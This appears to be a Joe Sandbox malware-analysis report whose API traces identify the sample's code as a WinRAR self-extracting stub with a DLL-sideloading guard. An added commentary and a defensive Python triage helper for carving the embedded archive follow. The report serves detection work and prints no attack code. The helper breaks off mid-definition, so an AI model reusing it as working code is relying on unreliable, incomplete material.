24356->24374 24359 418e7f 24357->24359 24358->24374 24622 4177b8 111 API calls 24358->24622 24625 423020 123 API calls 24359->24625 24360->24349 24361 418c93 24360->24361 24368 41981a 79 API calls 24360->24368 24361->24349 24620 419a3c 82 API calls 24361->24620 24366 418dbd 24362->24366 24621 412021 74 API calls 24365->24621 24370 418df5 24366->24370 24371 418de6 24366->24371 24366->24374 24368->24361 24624 419155 93 API calls __EH_prolog 24370->24624 24623 417542 85 API calls 24371->24623 24377 418f85 24374->24377 24626 412021 74 API calls 24374->24626 24376 419090 24376->24328 24378 41a4ed 3 
API calls 24376->24378 24377->24328 24377->24376 24379 41903e 24377->24379 24600 419f09 SetEndOfFile 24377->24600 24380 4190eb 24378->24380 24601 419da2 24379->24601 24380->24328 24627 412021 74 API calls 24380->24627 24383 419085 24385 419620 77 API calls 24383->24385 24385->24376 24386 4190fb 24628 416dcb 76 API calls _wcschr 24386->24628 24389 4116a4 24388->24389 24644 41cee1 24389->24644 24393 419f59 24392->24393 24394 419f63 24393->24394 24656 416d0c 78 API calls 24393->24656 24394->24224 24396->24230 24411 411732 24397->24411 24399 4113d6 24400 419e80 24399->24400 24402 419e92 24400->24402 24403 419ea5 24400->24403 24401 419eb0 24401->24270 24402->24401 24428 416d5b 77 API calls 24402->24428 24403->24401 24404 419eb8 SetFilePointer 24403->24404 24404->24401 24406 419ed4 GetLastError 24404->24406 24406->24401 24407 419ede 24406->24407 24407->24401 24429 416d5b 77 API calls 24407->24429 24409->24273 24410->24269 24412 411748 24411->24412 24423 4117a0 __InternalCxxFrameHandler 24411->24423 24413 411771 24412->24413 24424 416c36 76 API calls __vswprintf_c_l 24412->24424 24415 4117c7 24413->24415 24420 41178d ___std_exception_copy 24413->24420 24417 433e3e 22 API calls 24415->24417 24416 411767 24425 416ca7 75 API calls 24416->24425 24419 4117ce 24417->24419 24419->24423 24427 416ca7 75 API calls 24419->24427 24420->24423 24426 416ca7 75 API calls 24420->24426 24423->24399 24424->24416 24425->24413 24426->24423 24427->24423 24428->24403 24429->24401 24431 41cf4d 24430->24431 24433 41cf54 24430->24433 24435 41981a 24431->24435 24433->24278 24434->24280 24436 419833 24435->24436 24438 419e80 79 API calls 24436->24438 24437 419865 24437->24433 24438->24437 24440 42de78 24439->24440 24441 41e617 53 API calls 24440->24441 24442 42de9b 24441->24442 24443 414092 _swprintf 51 API calls 24442->24443 24444 42dead 24443->24444 24445 42d4d4 16 API calls 24444->24445 24446 421b7c 24445->24446 24446->24233 24448 4119bb 24447->24448 24449 4119bf 24447->24449 24448->24287 24452 
                                                              [Remaining control-flow graph edge data (basic-block addresses and API names) omitted from this text rendering.]

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00420863: GetModuleHandleW.KERNEL32(kernel32), ref: 0042087C
                                                                • Part of subcall function 00420863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0042088E
                                                                • Part of subcall function 00420863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004208BF
                                                                • Part of subcall function 0042A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0042A655
                                                                • Part of subcall function 0042AC16: OleInitialize.OLE32(00000000), ref: 0042AC2F
                                                                • Part of subcall function 0042AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0042AC66
                                                                • Part of subcall function 0042AC16: SHGetMalloc.SHELL32(00458438), ref: 0042AC70
                                                              • GetCommandLineW.KERNEL32 ref: 0042DF5C
                                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0042DF83
                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0042DF94
                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0042DFCE
                                                                • Part of subcall function 0042DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0042DBF4
                                                                • Part of subcall function 0042DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0042DC30
                                                              • CloseHandle.KERNEL32(00000000), ref: 0042DFD7
                                                              • GetModuleFileNameW.KERNEL32(00000000,0046EC90,00000800), ref: 0042DFF2
                                                              • SetEnvironmentVariableW.KERNEL32(sfxname,0046EC90), ref: 0042DFFE
                                                              • GetLocalTime.KERNEL32(?), ref: 0042E009
                                                              • _swprintf.LIBCMT ref: 0042E048
                                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0042E05A
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0042E061
                                                              • LoadIconW.USER32(00000000,00000064), ref: 0042E078
                                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0042E0C9
                                                              • Sleep.KERNEL32(?), ref: 0042E0F7
                                                              • DeleteObject.GDI32 ref: 0042E130
                                                              • DeleteObject.GDI32(?), ref: 0042E140
                                                              • CloseHandle.KERNEL32 ref: 0042E183
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xzF
                                                              • API String ID: 3049964643-722637502
                                                              • Opcode ID: bbb9f49d7674698a48ff7c551613358ff4313c31972a6c455aba32d6319696bf
                                                              • Instruction ID: cae8138b57838e3940175ab010df7b808a546fe122bba982981c657b09f06607
                                                              • Opcode Fuzzy Hash: bbb9f49d7674698a48ff7c551613358ff4313c31972a6c455aba32d6319696bf
                                                              • Instruction Fuzzy Hash: FB61F975A04354ABD320AF62FC49F6B379CAB45B09F40043FF945922A2EB7C9944C76E

                                                              Control-flow Graph

                                                              [Control-flow graph for the function at 0042A6C2 (FindResourceW / LoadResource / GdipCreateHBITMAPFromBitmap path): executed/not-executed graph edge data omitted from this text rendering.]
                                                              APIs
                                                              • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0042B73D,00000066), ref: 0042A6D5
                                                              • SizeofResource.KERNEL32(00000000,?,?,?,0042B73D,00000066), ref: 0042A6EC
                                                              • LoadResource.KERNEL32(00000000,?,?,?,0042B73D,00000066), ref: 0042A703
                                                              • LockResource.KERNEL32(00000000,?,?,?,0042B73D,00000066), ref: 0042A712
                                                              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0042B73D,00000066), ref: 0042A72D
                                                              • GlobalLock.KERNEL32(00000000), ref: 0042A73E
                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0042A762
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0042A7C6
                                                                • Part of subcall function 0042A626: GdipAlloc.GDIPLUS(00000010), ref: 0042A62C
                                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0042A7A7
                                                              • GlobalFree.KERNEL32(00000000), ref: 0042A7CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                              • String ID: PNG
                                                              • API String ID: 211097158-364855578
                                                              • Opcode ID: f935b368c9ba002b1f19cba1bc66bf95b4ca8dacc0e97d9a5be5b29e0947e936
                                                              • Instruction ID: a92c1f50a27306e4fab9d740a5b70080c2417c6747f5a4f3db80921ef297357f
                                                              • Opcode Fuzzy Hash: f935b368c9ba002b1f19cba1bc66bf95b4ca8dacc0e97d9a5be5b29e0947e936
                                                              • Instruction Fuzzy Hash: 1831B379600712AFD7109F21EC48D1BBBB9FF85B61B00052AFD05D2661EB35DC54CA6D

                                                              Control-flow Graph

                                                              [Control-flow graph for the function at 0041A69B (FindFirstFileW / FindNextFileW / GetLastError path): executed/not-executed graph edge data omitted from this text rendering.]
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0041A592,000000FF,?,?), ref: 0041A6C4
                                                                • Part of subcall function 0041BB03: _wcslen.LIBCMT ref: 0041BB27
                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0041A592,000000FF,?,?), ref: 0041A6F2
                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0041A592,000000FF,?,?), ref: 0041A6FE
                                                              • FindNextFileW.KERNEL32(?,?,?,?,?,?,0041A592,000000FF,?,?), ref: 0041A728
                                                              • GetLastError.KERNEL32(?,?,?,?,0041A592,000000FF,?,?), ref: 0041A734
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                              • String ID:
                                                              • API String ID: 42610566-0
                                                              • Opcode ID: 650d0cdfdb84c598e4bc4315ea1daa7d1b8fa1a746bb832b87273f8c75b54393
                                                              • Instruction ID: acc6d26e9758d04d2b9f739a9c16823cc8148dfb1e98a07eee097232a0ed5c58
                                                              • Opcode Fuzzy Hash: 650d0cdfdb84c598e4bc4315ea1daa7d1b8fa1a746bb832b87273f8c75b54393
                                                              • Instruction Fuzzy Hash: 1E41A376501115ABC725DF64CC88AEAF3B8FB48350F10029AF569E3240D738AEE0CF94
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(00000000,?,00437DC4,00000000,0044C300,0000000C,00437F1B,00000000,00000002,00000000), ref: 00437E0F
                                                              • TerminateProcess.KERNEL32(00000000,?,00437DC4,00000000,0044C300,0000000C,00437F1B,00000000,00000002,00000000), ref: 00437E16
                                                              • ExitProcess.KERNEL32 ref: 00437E28
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: 64d1974ab9b08f39d0de01bba1c105f752d1b432fcc46dec964edc90fd3cde81
                                                              • Instruction ID: f0ba565723585beee5013a0fe90ab60864e7b5fc6f440cc310a98c92d4ef7981
                                                              • Opcode Fuzzy Hash: 64d1974ab9b08f39d0de01bba1c105f752d1b432fcc46dec964edc90fd3cde81
                                                              • Instruction Fuzzy Hash: 90E04F35000144ABCF216F10DD0BA4A3F69EF19786F004465F9558A232CB39DE51CA88
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 608ff3c283eec5fefa1620390828d97e35c50ab2ee21493138926770a5ee2d90
                                                              • Instruction ID: d1a1e92b8f9287d3480e1e4291ff4da9a877ecd0ab5725131b819f88242ad64f
                                                              • Opcode Fuzzy Hash: 608ff3c283eec5fefa1620390828d97e35c50ab2ee21493138926770a5ee2d90
                                                              • Instruction Fuzzy Hash: 5C821B70904245AEDF15DF64C891BFBBB79AF05304F0841BFE8499B282DB385AC5CB69
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0042B7E5
                                                                • Part of subcall function 00411316: GetDlgItem.USER32(00000000,00003021), ref: 0041135A
                                                                • Part of subcall function 00411316: SetWindowTextW.USER32(00000000,004435F4), ref: 00411370
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0042B8D1
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0042B8EF
                                                              • IsDialogMessageW.USER32(?,?), ref: 0042B902
                                                              • TranslateMessage.USER32(?), ref: 0042B910
                                                              • DispatchMessageW.USER32(?), ref: 0042B91A
                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0042B93D
                                                              • EndDialog.USER32(?,00000001), ref: 0042B960
                                                              • GetDlgItem.USER32(?,00000068), ref: 0042B983
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0042B99E
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,004435F4), ref: 0042B9B1
                                                                • Part of subcall function 0042D453: _wcschr.LIBVCRUNTIME ref: 0042D45C
                                                                • Part of subcall function 0042D453: _wcslen.LIBCMT ref: 0042D47D
                                                              • SetFocus.USER32(00000000), ref: 0042B9B8
                                                              • _swprintf.LIBCMT ref: 0042BA24
                                                                • Part of subcall function 00414092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004140A5
                                                                • Part of subcall function 0042D4D4: GetDlgItem.USER32(00000068,0046FCB8), ref: 0042D4E8
                                                                • Part of subcall function 0042D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0042AF07,00000001,?,?,0042B7B9,0044506C,0046FCB8,0046FCB8,00001000,00000000,00000000), ref: 0042D510
                                                                • Part of subcall function 0042D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0042D51B
                                                                • Part of subcall function 0042D4D4: SendMessageW.USER32(00000000,000000C2,00000000,004435F4), ref: 0042D529
                                                                • Part of subcall function 0042D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0042D53F
                                                                • Part of subcall function 0042D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0042D559
                                                                • Part of subcall function 0042D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0042D59D
                                                                • Part of subcall function 0042D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0042D5AB
                                                                • Part of subcall function 0042D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0042D5BA
                                                                • Part of subcall function 0042D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0042D5E1
                                                                • Part of subcall function 0042D4D4: SendMessageW.USER32(00000000,000000C2,00000000,004443F4), ref: 0042D5F0
                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0042BA68
                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0042BA90
                                                              • GetTickCount.KERNEL32 ref: 0042BAAE
                                                              • _swprintf.LIBCMT ref: 0042BAC2
                                                              • GetLastError.KERNEL32(?,00000011), ref: 0042BAF4
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0042BB43
                                                              • _swprintf.LIBCMT ref: 0042BB7C
                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0042BBD0
                                                              • GetCommandLineW.KERNEL32 ref: 0042BBEA
                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0042BC47
                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 0042BC6F
                                                              • Sleep.KERNEL32(00000064), ref: 0042BCB9
                                                              • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0042BCE2
                                                              • CloseHandle.KERNEL32(00000000), ref: 0042BCEB
                                                              • _swprintf.LIBCMT ref: 0042BD1E
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0042BD7D
                                                              • SetDlgItemTextW.USER32(?,00000065,004435F4), ref: 0042BD94
                                                              • GetDlgItem.USER32(?,00000065), ref: 0042BD9D
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0042BDAC
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0042BDBB
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0042BE68
                                                              • _wcslen.LIBCMT ref: 0042BEBE
                                                              • _swprintf.LIBCMT ref: 0042BEE8
                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 0042BF32
                                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0042BF4C
                                                              • GetDlgItem.USER32(?,00000068), ref: 0042BF55
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0042BF6B
                                                              • GetDlgItem.USER32(?,00000066), ref: 0042BF85
                                                              • SetWindowTextW.USER32(00000000,0045A472), ref: 0042BFA7
                                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0042C007
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0042C01A
                                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0042C0BD
                                                              • EnableWindow.USER32(00000000,00000000), ref: 0042C197
                                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0042C1D9
                                                                • Part of subcall function 0042C73F: __EH_prolog.LIBCMT ref: 0042C744
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0042C1FD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Message$ItemSend$Text$Window$_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmap__vswprintf_c_l_wcschr
                                                              • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDGu<B$STARTDLG$^B$__tmp_rar_sfx_access_check_%u$hB$winrarsfxmappingfile.tmp$QD
                                                              • API String ID: 4093411769-2252938024
                                                              • Opcode ID: 112c9e3beab5aee5498ee1d19615b62134dc9100a96aa53735405d932f4570b6
                                                              • Instruction ID: 336c59d72ed0fced3ae041aaf9444776fa13e3bad7e60765d9611c7d9bea4ec2
                                                              • Opcode Fuzzy Hash: 112c9e3beab5aee5498ee1d19615b62134dc9100a96aa53735405d932f4570b6
                                                              • Instruction Fuzzy Hash: 6542FB70A44364BAEB219F61AC4AFBF376CEB01705F80006BF544A61D2DB7D9984CB6D

                                                              Control-flow Graph
                                                              • Rendered graph not preserved. Summary: function 00420863-00420E05; the entry block calls 0042EC50 and GetModuleHandleW, then GetProcAddress (twice); the self-read path calls GetModuleFileNameW, CreateFileW, SetFilePointer, ReadFile, 00420371, 0042081B and CloseHandle; the directory-check path calls GetModuleFileNameW, 0041C29A, 00420602, 0041B146, CompareStringW, 0041C310 and GetFileAttributesW (twice); the warning path calls 00414092, AllocConsole, GetCurrentProcessId, AttachConsole, 00433E13, GetStdHandle, WriteConsoleW, Sleep, FreeConsole and ExitProcess, with an alternative branch through 0042081B (×2), 0041E617 and 0042A7E4.
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32), ref: 0042087C
                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0042088E
                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004208BF
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00420B69
                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00420B83
                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00420B93
                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,|<D,00000000), ref: 00420BB1
                                                              • CloseHandle.KERNEL32(00000000), ref: 00420C09
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00420C1E
                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<D,?,00000000,?,00000800), ref: 00420C72
                                                              • GetFileAttributesW.KERNELBASE(?,?,|<D,00000800,?,00000000,?,00000800), ref: 00420C9C
                                                              • GetFileAttributesW.KERNEL32(?,?,D=D,00000800), ref: 00420CD8
                                                                • Part of subcall function 0042081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00420836
                                                                • Part of subcall function 0042081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0041F2D8,Crypt32.dll,00000000,0041F35C,?,?,0041F33E,?,?,?), ref: 00420858
                                                              • _swprintf.LIBCMT ref: 00420D4A
                                                              • _swprintf.LIBCMT ref: 00420D96
                                                                • Part of subcall function 00414092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004140A5
                                                              • AllocConsole.KERNEL32 ref: 00420D9E
                                                              • GetCurrentProcessId.KERNEL32 ref: 00420DA8
                                                              • AttachConsole.KERNEL32(00000000), ref: 00420DAF
                                                              • _wcslen.LIBCMT ref: 00420DC4
                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00420DD5
                                                              • WriteConsoleW.KERNEL32(00000000), ref: 00420DDC
                                                              • Sleep.KERNEL32(00002710), ref: 00420DE7
                                                              • FreeConsole.KERNEL32 ref: 00420DED
                                                              • ExitProcess.KERNEL32 ref: 00420DF5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                              • String ID: (=D$,<D$,@D$0?D$0AD$4BD$8>D$D=D$DXGIDebug.dll$H?D$H@D$HAD$P>D$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=D$`@D$d?D$dAD$dwmapi.dll$h=D$h>D$kernel32$uxtheme.dll$|<D$|?D$|@D$<D$>D$?D$@D$AD
                                                              • API String ID: 1207345701-1661281665
                                                              • Opcode ID: 78f292a317e63267868c60634eb9f4ab8335585eea81046122b0759475e39766
                                                              • Instruction ID: 7a74d89ca023e829d056ff1a93ac3ebf91380116c60b8d83fec77a11177f812f
                                                              • Opcode Fuzzy Hash: 78f292a317e63267868c60634eb9f4ab8335585eea81046122b0759475e39766
                                                              • Instruction Fuzzy Hash: D6D195B1508354ABE330DF51D849B9FBAE8BF85B09F50891FF28597241C7B88648CB5E
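The two entries above are the most useful ones in this dump for triage. The strings in the function at 0042B7E5 (winrarsfxmappingfile.tmp, __tmp_rar_sfx_access_check_%u, the `-el -s2 "-d%s" "-sp%s"` command template, LICENSEDLG, STARTDLG) together with CreateFileMappingW/MapViewOfFile/ShellExecuteExW identify the native module at 00410000 as a WinRAR self-extracting (SFX) stub: the .NET payloads flagged in the overview are carried inside it, not in this code. The function at 00420863 is the stub's sideloading guard: it resolves SetDllDirectoryW and SetDefaultDllDirectories (the APIs used to restrict the DLL search path), checks with GetFileAttributesW whether DXGIDebug.dll, dwmapi.dll or uxtheme.dll sit beside the executable, and if so writes "Please remove %s from %s folder. It is unsecure to run %s until it is done." to a freshly allocated console, sleeps 0x2710 ms and calls ExitProcess. The script below is an added triage helper written for this page, not Joe Sandbox or WinRAR code: it scans a file image for those stub strings and locates the embedded archive by its RAR magic so the payload offset can be carved. The RAR signature bytes are public format facts not taken from the report, the input blob in `build_sample()` is constructed, and the two-marker threshold in `is_winrar_sfx` is this example's own choice.

```python
"""Triage helper for WinRAR SFX stubs (added example; not sandbox or WinRAR code).

Markers come from the strings the report lists for the functions at
0042B7E5 and 00420863.  RAR magic values are public format constants.
"""
from __future__ import annotations

import sys
from dataclasses import dataclass, field

# Strings the report attributes to the SFX stub (entries 0042B7E5 / 00420863).
SFX_MARKERS = (
    "winrarsfxmappingfile.tmp",
    "__tmp_rar_sfx_access_check_%u",
    '-el -s2 "-d%s" "-sp%s"',
    "LICENSEDLG",
    "STARTDLG",
    "Please remove %s from %s folder. It is unsecure to run %s until it is done.",
)

# DLL names the sideloading guard at 00420863 looks for next to the executable.
SIDELOAD_DLLS = ("DXGIDebug.dll", "dwmapi.dll", "uxtheme.dll")

# RAR archive signatures (public format facts, not from the report).
RAR4_MAGIC = b"Rar!\x1a\x07\x00"       # RAR 1.5 - 4.x
RAR5_MAGIC = b"Rar!\x1a\x07\x01\x00"   # RAR 5


@dataclass
class SfxTriage:
    is_pe: bool
    markers_found: list[str] = field(default_factory=list)
    sideload_guard: bool = False
    rar_offset: int | None = None
    rar_version: str | None = None

    @property
    def is_winrar_sfx(self) -> bool:
        # Threshold chosen for this example: one dialog name alone is not
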